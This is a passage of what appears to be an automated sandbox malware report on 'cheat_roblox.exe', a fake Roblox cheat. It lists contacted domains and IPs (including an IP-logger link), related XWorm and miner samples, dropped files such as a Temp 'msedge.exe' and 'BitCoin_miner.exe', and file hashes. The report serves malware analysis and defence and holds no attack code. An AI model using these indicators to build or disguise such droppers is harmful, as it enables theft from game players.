                                  https://hazipatika.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://joyreactor.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://cookreactor.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://wildixin.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://eworkbookcloud.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://cognitiveai.rusets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://nacion.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://chennien.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://deccoria.plsets.json.8.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper.RobloxPlayerInstaller_2ACC2.log.4.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://mercadopago.clsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://talkdeskstgid.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://naukri.comsets.json.8.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crl.securetrust.com/STCA.crlRobloxPlayerInstaller.exe, 00000004.00000003.3805632795.0000000002908000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3804614104.0000000002900000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805540908.0000000002903000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.2147849285.00000000028F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://interia.plsets.json.8.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://bonvivir.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://carcostadvisor.besets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0RobloxPlayerInstaller.exe, 00000004.00000003.3807113802.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3810334754.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806625955.0000000004B52000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3804614104.0000000002900000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805259590.000000000290B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.2147849285.00000000028F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://salemovetravel.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://sapo.iosets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://wpext.plsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://welt.desets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://poalim.sitesets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://infoedgeindia.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.cert.fnmt.es/dpcs/RobloxPlayerInstaller.exe, 00000004.00000003.3810149194.0000000004B73000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806474802.0000000004B6C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805832036.0000000004B57000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806667375.0000000004B75000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806735943.0000000004B6F000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3807165811.0000000004B76000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3817719825.0000000004B73000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806735943.0000000004B76000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3807996527.0000000004B79000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://blackrockadvisorelite.itsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://cognitive-ai.rusets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.accv.es00RobloxPlayerInstaller.exe, 00000004.00000003.3807113802.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3810334754.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3817388694.000000000292E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805970195.000000000292E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805197288.0000000002928000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806625955.0000000004B52000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3804614104.0000000002900000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805306444.0000000002929000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.2147849285.00000000028F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://cafemedia.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://thirdspace.org.ausets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://mercadoshops.com.arsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://smpn106jkt.sch.idsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://elpais.uysets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://landyrev.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://the42.iesets.json.8.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://commentcamarche.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://tucarro.com.vesets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://rws3nvtvt.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://eleconomista.netsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://helpdesk.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.winimage.com/zLibDll1.2.11rbrcheat_roblox.exe, 00000000.00000003.2114148153.000001CD56234000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.2127225395.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://mercadolivre.com.brsets.json.8.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.firmaprofesional.com/cps0RobloxPlayerInstaller.exe, 00000004.00000003.3805712625.0000000004BAE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805686454.0000000004B82000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3817867790.0000000004B9A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805883321.0000000004B99000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805604637.0000000004BA1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3817937358.0000000004BB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://iplogger.org/chromecache_145.11.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://clmbtech.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  88.212.201.198
                                  		unknownRussian Federation
                                  		39134UNITEDNETRUfalse
                                  128.116.21.3
                                  		edge-term4-ams2.roblox.comUnited States
                                  		22697ROBLOX-PRODUCTIONUSfalse
                                  128.116.21.4
                                  		unknownUnited States
                                  		22697ROBLOX-PRODUCTIONUSfalse
                                  104.21.79.229
                                  		2no.coUnited States
                                  		13335CLOUDFLARENETUSfalse
                                  172.67.132.113
                                  		cdn.iplogger.orgUnited States
                                  		13335CLOUDFLARENETUSfalse
                                  239.255.255.250
                                  		unknownReserved
                                  		unknownunknownfalse
                                  35.190.80.1
                                  		a.nel.cloudflare.comUnited States
                                  		15169GOOGLEUSfalse
                                  142.250.186.100
                                  		www.google.comUnited States
                                  		15169GOOGLEUSfalse
                                  88.212.201.204
                                  		counter.yadro.ruRussian Federation
                                  		39134UNITEDNETRUfalse
                                  13.32.110.82
                                  		d2v57ias1m20gl.cloudfront.netUnited States
                                  		16509AMAZON-02USfalse

                                  Private

                                  IP
                                  192.168.2.7
                                  192.168.2.6
                                  127.0.0.1

                                  General Information

                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1484385
                                  Start date and time:2024-07-30 00:55:41 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 8m 15s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Run name:Run with higher sleep bypass
                                  Number of analysed new started processes analysed:14
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:cheat_roblox.exe
                                  Detection:MAL
                                  Classification:mal52.troj.spyw.evad.winEXE@33/28@20/13
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:Failed
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 2.16.43.25, 142.250.185.78, 108.177.15.84, 216.58.212.131, 192.229.221.95, 34.104.35.123, 199.232.214.172, 216.58.212.163, 199.232.210.172, 23.51.111.252, 216.58.212.142, 142.250.185.163
                                  • Excluded domains from analysis (whitelisted): clients1.google.com, client.wns.windows.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, clientsettingscdn.roblox.com.edgekey.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, e7229.f.akamaiedge.net, clients.l.google.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: cheat_roblox.exe

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  18:57:17API Interceptor430280x Sleep call for process: RobloxPlayerInstaller.exe modified

                                  LLM Input / Output

                                  InputOutput
                                  URL: https://2no.co/24RXx6 Model: Perplexity: mixtral-8x7b-instruct
                                  {"loginform": false,"urgency": false,"captcha": false,"reasons": ["The webpage does not contain a login form, as there is no explicit request for sensitive information such as passwords, email addresses, usernames, phone numbers, or credit card numbers.","The text does not create a sense of urgency, as it does not use phrases such as 'click here to view document' or 'to view secured document click here'.","The webpage does not contain a CAPTCHA or any other anti-robot detection mechanism.","The webpage emphasizes the user's privacy, and provides a link to its privacy policy and terms & conditions, indicating a commitment to data protection."]}
                                  Title: Branded Short Domain OCR: *landshake We value your privacy This link was created by the user of URL Shortener Service IPLagger_ By clicking on this link, you can give your consent to the provision ot your personal data, SUCII as IP address, browser type anc operating system and other data, as well as using cookies to IPLogger, as well as to its partners and users. You can learn more about data processing and removing your data in IPLogger Privacy Policy. You can also follow this link without any data being recorded and processed. We value your privacy, that is why we are seeking your consent prior to collecting any Cata. Agree & Continue Ey clicking on "Agree & Continuer you egree with the Privazpolicy. I Terms &. Conditions For continue without consent click here

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  104.21.79.229roblox cheat.exeGet hashmaliciousXWormBrowse
                                    C0ED98D08381257B540A04C0868ECD6A628649AA70FEBCBE03778BAE532FB5BE.exeGet hashmaliciousBdaejec, BitCoin Miner, XmrigBrowse
                                      lSmb6nDsrC.exeGet hashmaliciousSmokeLoaderBrowse
                                        setup.exeGet hashmaliciousUnknownBrowse
                                          setup.exeGet hashmaliciousUnknownBrowse
                                            Og1SeeXcB2.exeGet hashmaliciousRemcos, Blank Grabber, PrivateLoader, SmokeLoaderBrowse
                                              file.exeGet hashmaliciousSmokeLoaderBrowse
                                                setup.htaGet hashmaliciousRHADAMANTHYSBrowse
                                                  setup.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                    Blog.zipGet hashmaliciousRHADAMANTHYSBrowse
                                                      88.212.201.198http://www.puusektori.fiGet hashmaliciousGRQ ScamBrowse
                                                      • counter.yadro.ru/hit;fims2?t38.6;r;s1280*1024*24;uhttp%3A//www.puusektori.fi/;hkuinka%20monta%20opintoviikkoa%20on%20ammatillisen%20perustutkinnon%20laajuus;0.6661644312023942
                                                      njw.exeGet hashmaliciousUnknownBrowse
                                                      • counter.yadro.ru/hit;counter1?r;s1280*1024*32;uhttp%3A//www.all-bearings.narod.ru/secondpage.html;0.5443641556055339
                                                      128.116.21.3roblox cheat.exeGet hashmaliciousXWormBrowse
                                                        roblox cheat.exeGet hashmaliciousXWormBrowse
                                                          Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                            128.116.21.4solarabootstrapper.exeGet hashmaliciousXWormBrowse
                                                              RdJ73GU3N1.exeGet hashmaliciousNjratBrowse
                                                                SecuriteInfo.com.Win32.BackdoorX-gen.25355.5373.exeGet hashmaliciousUnknownBrowse
                                                                  Roblox Account Manager.exeGet hashmaliciousUnknownBrowse

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    counter.yadro.ruroblox cheat.exeGet hashmaliciousXWormBrowse
                                                                    • 88.212.201.198
                                                                    roblox cheat.exeGet hashmaliciousXWormBrowse
                                                                    • 88.212.201.198
                                                                    LisectAVT_2403002A_312.exeGet hashmaliciousHTMLPhisherBrowse
                                                                    • 88.212.201.204
                                                                    LisectAVT_2403002A_312.exeGet hashmaliciousHTMLPhisherBrowse
                                                                    • 88.212.201.204
                                                                    http://ads.livetv799.meGet hashmaliciousUnknownBrowse
                                                                    • 88.212.202.52
                                                                    4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                                    • 88.212.201.204
                                                                    4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                                    • 88.212.202.52
                                                                    file.exeGet hashmaliciousXenoRATBrowse
                                                                    • 88.212.202.52
                                                                    http://singlelogin.rsGet hashmaliciousUnknownBrowse
                                                                    • 88.212.201.198
                                                                    2no.coroblox cheat.exeGet hashmaliciousXWormBrowse
                                                                    • 104.21.79.229
                                                                    roblox cheat.exeGet hashmaliciousXWormBrowse
                                                                    • 172.67.149.76
                                                                    C0ED98D08381257B540A04C0868ECD6A628649AA70FEBCBE03778BAE532FB5BE.exeGet hashmaliciousBdaejec, BitCoin Miner, XmrigBrowse
                                                                    • 104.21.79.229
                                                                    lSmb6nDsrC.exeGet hashmaliciousSmokeLoaderBrowse
                                                                    • 104.21.79.229
                                                                    setup.exeGet hashmaliciousUnknownBrowse
                                                                    • 104.21.79.229
                                                                    setup.exeGet hashmaliciousUnknownBrowse
                                                                    • 104.21.79.229
                                                                    file.exeGet hashmaliciousXenoRATBrowse
                                                                    • 172.67.149.76
                                                                    Og1SeeXcB2.exeGet hashmaliciousRemcos, Blank Grabber, PrivateLoader, SmokeLoaderBrowse
                                                                    • 104.21.79.229
                                                                    file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                    • 104.21.79.229
                                                                    edge-term4-ams2.roblox.comroblox cheat.exeGet hashmaliciousXWormBrowse
                                                                    • 128.116.21.3
                                                                    solarabootstrapper.exeGet hashmaliciousXWormBrowse
                                                                    • 128.116.21.4
                                                                    roblox cheat.exeGet hashmaliciousXWormBrowse
                                                                    • 128.116.21.3
                                                                    RdJ73GU3N1.exeGet hashmaliciousNjratBrowse
                                                                    • 128.116.21.4
                                                                    SecuriteInfo.com.Win32.BackdoorX-gen.25355.5373.exeGet hashmaliciousUnknownBrowse
                                                                    • 128.116.21.4
                                                                    Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                    • 128.116.21.4
                                                                    Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                    • 128.116.21.3

                                                                    ASNs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    UNITEDNETRUroblox cheat.exeGet hashmaliciousXWormBrowse
                                                                    • 88.212.201.198
                                                                    roblox cheat.exeGet hashmaliciousXWormBrowse
                                                                    • 88.212.201.204
                                                                    Universal Radio Programmer.pdfGet hashmaliciousUnknownBrowse
                                                                    • 88.212.201.204
                                                                    LisectAVT_2403002A_312.exeGet hashmaliciousHTMLPhisherBrowse
                                                                    • 88.212.201.204
                                                                    LisectAVT_2403002A_312.exeGet hashmaliciousHTMLPhisherBrowse
                                                                    • 88.212.201.204
                                                                    http://ads.livetv799.meGet hashmaliciousUnknownBrowse
                                                                    • 88.212.202.52
                                                                    4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                                    • 88.212.201.204
                                                                    4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                                    • 88.212.201.204
                                                                    file.exeGet hashmaliciousXenoRATBrowse
                                                                    • 88.212.202.52
                                                                    ROBLOX-PRODUCTIONUSroblox cheat.exeGet hashmaliciousXWormBrowse
                                                                    • 128.116.21.3
                                                                    solarabootstrapper.exeGet hashmaliciousXWormBrowse
                                                                    • 128.116.21.4
                                                                    roblox cheat.exeGet hashmaliciousXWormBrowse
                                                                    • 128.116.21.3
                                                                    Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                    • 128.116.123.3
                                                                    Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                    • 128.116.123.4
                                                                    Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                    • 128.116.123.4
                                                                    Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                    • 128.116.127.3
                                                                    Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                    • 128.116.119.4
                                                                    RdJ73GU3N1.exeGet hashmaliciousNjratBrowse
                                                                    • 128.116.21.4
                                                                    ROBLOX-PRODUCTIONUSroblox cheat.exeGet hashmaliciousXWormBrowse
                                                                    • 128.116.21.3
                                                                    solarabootstrapper.exeGet hashmaliciousXWormBrowse
                                                                    • 128.116.21.4
                                                                    roblox cheat.exeGet hashmaliciousXWormBrowse
                                                                    • 128.116.21.3
                                                                    Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                    • 128.116.123.3
                                                                    Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                    • 128.116.123.4
                                                                    Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                    • 128.116.123.4
                                                                    Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                    • 128.116.127.3
                                                                    Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                    • 128.116.119.4
                                                                    RdJ73GU3N1.exeGet hashmaliciousNjratBrowse
                                                                    • 128.116.21.4

                                                                    JA3 Fingerprints

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    1138de370e523e824bbca92d049a3777http://pub-99b5c3466f52474c877bb48aca98b2d8.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                    • 173.222.162.64
                                                                    http://2323.pages.dev/Get hashmaliciousUnknownBrowse
                                                                    • 173.222.162.64
                                                                    http://www.kjecom.com/serviciodecorreo/login/Get hashmaliciousUnknownBrowse
                                                                    • 173.222.162.64
                                                                    http://matmcst.gitbook.io/usGet hashmaliciousUnknownBrowse
                                                                    • 173.222.162.64
                                                                    http://pub-91cd24230d1a47f198e6036ff20062e7.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                    • 173.222.162.64
                                                                    http://connectinmate.org/@@@/cancelss/index.phpGet hashmaliciousHTMLPhisherBrowse
                                                                    • 173.222.162.64
                                                                    https://dweb.link/ipfs/bafkreiawdiwmd7ylz26ssoykvo7gopw6heodzdjcfhtb3v6dkm6k57iqwuGet hashmaliciousHTMLPhisherBrowse
                                                                    • 173.222.162.64
                                                                    http://pub-1319180bb90248deb7023e5f86025f65.r2.dev/zane.htmlGet hashmaliciousUnknownBrowse
                                                                    • 173.222.162.64
                                                                    https://orr.swq.mybluehost.me/ch/Get hashmaliciousUnknownBrowse
                                                                    • 173.222.162.64
                                                                    28a2c9bd18a11de089ef85a160da29e4https://urlz.fr/rlHVGet hashmaliciousUnknownBrowse
                                                                    • 23.32.185.164
                                                                    • 20.12.23.50
                                                                    roblox cheat.exeGet hashmaliciousXWormBrowse
                                                                    • 23.32.185.164
                                                                    • 20.12.23.50
                                                                    http://pub-99b5c3466f52474c877bb48aca98b2d8.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                    • 23.32.185.164
                                                                    • 20.12.23.50
                                                                    https://liupseerio-f45e48.ingress-baronn.ewp.live/wp-content/mu-plugins/dibinan/pages/region.phpGet hashmaliciousUnknownBrowse
                                                                    • 23.32.185.164
                                                                    • 20.12.23.50
                                                                    http://metemiskalogio.gitbook.io/usGet hashmaliciousUnknownBrowse
                                                                    • 23.32.185.164
                                                                    • 20.12.23.50
                                                                    https://chattts-49f1.beszyrecala.workers.dev/26d0111e-bce1-4044-b6b4-e1=Get hashmaliciousUnknownBrowse
                                                                    • 23.32.185.164
                                                                    • 20.12.23.50
                                                                    https://att-net-6cf915.webflow.io/Get hashmaliciousUnknownBrowse
                                                                    • 23.32.185.164
                                                                    • 20.12.23.50
                                                                    http://pub-2fad846527d7473aa1d1ed2a45595d9d.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                    • 23.32.185.164
                                                                    • 20.12.23.50
                                                                    roblox cheat.exeGet hashmaliciousXWormBrowse
                                                                    • 23.32.185.164
                                                                    • 20.12.23.50
                                                                    3b5074b1b5d032e5620f69f9f700ff0esolarabootstrapper.exeGet hashmaliciousXWormBrowse
                                                                    • 40.113.110.67
                                                                    b51175581d84bf44fdbadff6a71ecc7c4cec821be778d0cbc7eb9a6417e8ff96_dump.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 40.113.110.67
                                                                    http://pub-91cd24230d1a47f198e6036ff20062e7.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                    • 40.113.110.67
                                                                    http://connectinmate.org/@@@/cancelss/index.phpGet hashmaliciousHTMLPhisherBrowse
                                                                    • 40.113.110.67
                                                                    https://logn-sso-ttrezor.webflow.io/Get hashmaliciousUnknownBrowse
                                                                    • 40.113.110.67
                                                                    https://habilitaminasanni-f5135f.ingress-earth.ewp.live/wp-content/plugins/voresprioritet/pages/region.phpGet hashmaliciousUnknownBrowse
                                                                    • 40.113.110.67
                                                                    https://urlz.fr/rpXzGet hashmaliciousUnknownBrowse
                                                                    • 40.113.110.67
                                                                    https://berwachun-f45e48.ingress-earth.ewp.live/wp-content/plugins/pko/pages/region.phpGet hashmaliciousUnknownBrowse
                                                                    • 40.113.110.67
                                                                    7va1lgSJFv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                    • 40.113.110.67
                                                                    AWB.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 40.113.110.67

                                                                    Dropped Files

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    C:\Users\user\AppData\Local\Temp\ msedge.exeroblox cheat.exeGet hashmaliciousXWormBrowse
                                                                      roblox cheat.exeGet hashmaliciousXWormBrowse
                                                                        C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeroblox cheat.exeGet hashmaliciousXWormBrowse
                                                                          roblox cheat.exeGet hashmaliciousXWormBrowse

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Roblox\logs\RobloxPlayerInstaller_2ACC2.log

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe
                                                                            File Type:ASCII text, with CRLF, CR line terminators
                                                                            Category:dropped
                                                                            Size (bytes):3995
                                                                            Entropy (8bit):5.355780161863253
                                                                            Encrypted:false
                                                                            SSDEEP:96:qXsr8s8i8JuRdrbqNbSJ8JE1JEiJcgO24s55FJMH:q8r8s8i8J+dmUJ8JCJXJbJJs
                                                                            MD5:6920C83041459894F0469F4C24F2A6C8
                                                                            SHA1:B96D5A47F4606E8F15DE8B55B59773F75D727A73
                                                                            SHA-256:F06AEFB69965DFD61CBBDEB8FCAFD28AB3B0091900B748B2EEBD1788AB673482
                                                                            SHA-512:BC25D90F6DCFD90CBA5764BD8E46A27E54A70B2CF35CAE2332CE0528D7C58A6CE31C6362508ED33B6EF2D59D0C489921EFB252402720262358AC47533DC60DDA
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:2024-07-29T22:56:32.670Z..2024-07-29T22:56:32.071Z,0.071638,031c,6,Info [FLog::DesktopInstaller] The installer reporter is initialized..2024-07-29T22:56:32.071Z,0.071703,031c,6,Info [FLog::DesktopInstaller] Reporting Installer Start..2024-07-29T22:56:33.037Z,1.037293,0f28,6,Critical [FLog::DesktopInstaller] failed Http POST url: https://client-telemetry.roblox.com, code: 11, message: HttpError: TlsVerificationFail, body ..2024-07-29T22:56:33.840Z,1.840217,091c,6,Info [FLog::DesktopInstaller] Start the Installer thread..2024-07-29T22:56:33.974Z,1.974350,091c,6,Info [FLog::DesktopInstaller] The installer will run InstallNormal..2024-07-29T22:56:33.977Z,1.977791,091c,6,Info [FLog::DesktopInstaller] Fetch flag info..2024-07-29T22:56:34.642Z,2.642278,0f28,6,Critical [FLog::DesktopInstaller] failed Http GET url: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper, code: 11, message: HttpError: TlsVerificationFail, body: ..2024-07-29T22:57:20.263Z,48.263100,0f28,

                                                                            C:\Users\user\AppData\Local\Roblox\logs\cacert.pem

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe
                                                                            File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):233235
                                                                            Entropy (8bit):6.025218023713329
                                                                            Encrypted:false
                                                                            SSDEEP:3072:OhGvwW6Jj7ITWYv0yoVH283rz9WqIAsjjg4DsUQS88UP4TFf3xVOVkCC554jMN/C:M5W+j8chWf8xyvp5iIzB4CNxza/MK
                                                                            MD5:0194EB945475F93844C0FAE769C0FA0B
                                                                            SHA1:D72876A801C702348EA5B4B4A333C484F2A721FD
                                                                            SHA-256:A6BC06B8255E4AFE2EEFF34684605D04DF9EC246FC201BF5E44137987189A0D3
                                                                            SHA-512:72A00FE6B9111CAB22F1F424F815A617BE2041A3857A6265B004CA1BFD10F345CA33369CD43009B483F9436CCBCD69C70F7033A85D94527B1F39846B75B43C17
                                                                            Malicious:false
                                                                            Reputation:low
